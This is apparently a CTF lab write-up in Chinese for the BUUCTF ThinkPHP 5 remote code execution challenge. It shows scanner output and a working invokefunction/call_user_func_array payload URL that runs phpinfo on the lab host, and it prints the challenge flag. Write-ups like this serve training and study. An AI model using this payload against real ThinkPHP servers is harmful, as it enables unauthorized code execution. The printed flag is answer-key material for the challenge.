BUUCTF-Real-[ThinkPHP]5-Rce

1、ThinkPHP检测工具

复制代码
https://github.com/anx0ing/thinkphp_scan

漏洞检测

复制代码
通过漏洞检测,我们发现存在rce漏洞!

2、漏洞利用

复制代码
----
[!] Name: Thinkphp5 5.0.22/5.1.29 Remote Code Execution Vulnerability
    Script: thinkphp5022_5129.py
    Url: http://node5.buuoj.cn:27683/
      Vulnerable: True
      Attack: True
      Method: GET
      Payload: http://node5.buuoj.cn:27683/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=1
----

payload
复制代码
http://node5.buuoj.cn:27683/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1 and it'll execute the phpinfo:

修改payload,我们就可以拿到phpinfo页面,flag就在其中!


复制代码
至于扫描器,githb有很多!自己下载!

3、get flag


复制代码
flag{9f4a1a0b-ef58-49ac-8344-63aa3914af75} 
相关推荐
北龙云海6 小时前
案例分享 | 面向公网业务系统境内访问白名单配置实操方案
运维·网络·安全·网络安全·告警·数据泄露·入侵攻击
Draina9 小时前
CBC填充预言攻击-CBC Padding Oracle Crypto Attack
python·安全·web安全·网络安全·密码学·安全性测试
国际云,接待21 小时前
Google Cloud Armor实战:给网站API加WAF、限速和日志验证
后端·网络安全·云计算·googlecloud
Demons_kirit2 天前
实验:文件路径遍历,简单情况(Lab: File path traversal, simple case)
网络安全
sbjdhjd2 天前
SQL 注入零基础详解:原理、手工注入流程与 Sqli-Labs 靶场实战1~5关和第9关思路
数据库·sql·计算机网络·web安全·网络安全·网络攻击模型·安全架构
学习溢出2 天前
【网络安全】Living off the Land 攻击 | 蓝队防守
安全·web安全·网络安全
学逆向的2 天前
汇编——寻址方式
开发语言·汇编·网络安全
上海云盾-高防顾问3 天前
SD-WAN 跨境加速,真实日常使用体验
网络·网络安全
中北marry3 天前
玄机靶场wp 应急响应-webshell查杀
网络安全
爱网络爱Linux3 天前
HCIA-Security(1)网络安全常见的威胁
web安全·网络安全·hcia-security·hcia安全·华为网络安全·网络安全常见的威胁